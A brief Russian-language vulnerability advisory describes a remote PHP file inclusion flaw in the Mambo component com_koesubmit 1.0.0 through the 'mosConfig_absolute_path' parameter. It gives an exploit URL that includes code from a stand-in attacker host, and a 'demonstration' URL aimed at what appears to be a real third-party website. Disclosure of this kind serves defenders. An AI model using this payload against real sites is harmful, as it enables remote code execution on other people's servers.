Программа: Mambo Component com_koesubmit 1.0.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «mosConfig_absolute_path» сценарием koesubmit.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.
Эксплоит:
http://127.0.0.1/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=attacker?
Демонстрация:
http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=